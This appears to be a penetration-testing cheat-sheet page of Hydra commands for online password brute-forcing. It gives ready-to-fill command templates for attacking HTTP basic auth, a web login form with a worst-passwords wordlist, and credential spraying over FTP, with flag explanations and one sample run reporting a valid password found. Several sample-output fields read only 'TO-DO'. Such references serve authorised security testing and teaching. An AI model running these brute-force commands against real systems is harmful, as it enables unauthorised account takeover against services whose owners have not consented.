Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
HTTP basic auth
hydra -L <USERS_FILE> -P <PASSWORD_FILE> -s <TARGET_PORT> -f <TARGET> http-get /
Sample Output:
TO-DO+-------------------------------------------+
| -s : port |
| -L : usernames file |
| -P : passwords file |
| -f : exit when a login/pass pair is found |
+-------------------------------------------+
Sample Output:
TO-DOWeb Page Login Form
hydra <TARGET> -l <USER> -P /usr/share/seclists/Passwords/500-worst-passwords.txt http-post-form '/login.php:username=admin&password=^PASS^&remember=yes:Incorrect password'
Sample Output:
TO-DO+-------------------------------------------+
| -l : username |
| -P : wordlist |
| http-post-form : service |
| /login.php : action |
| ^PASS^ : payload indicator |
| Incorrect password : login failure string |
+-------------------------------------------+
Sample Output:
TO-DOPassword spraying with user:password format
hydra -C <CREDS_FILE> <PROTOCOL>://<TARGET>
Sample Output:
hydra -C creds.txt ftp://172.16.1.1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-28 11:36:09
[DATA] max 16 tasks per 1 server, overall 16 tasks, 19 login tries, ~2 tries per task
[DATA] attacking ftp://172.16.1.1:21/
[21][ftp] host: 172.16.1.1 login: user password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-28 11:36:46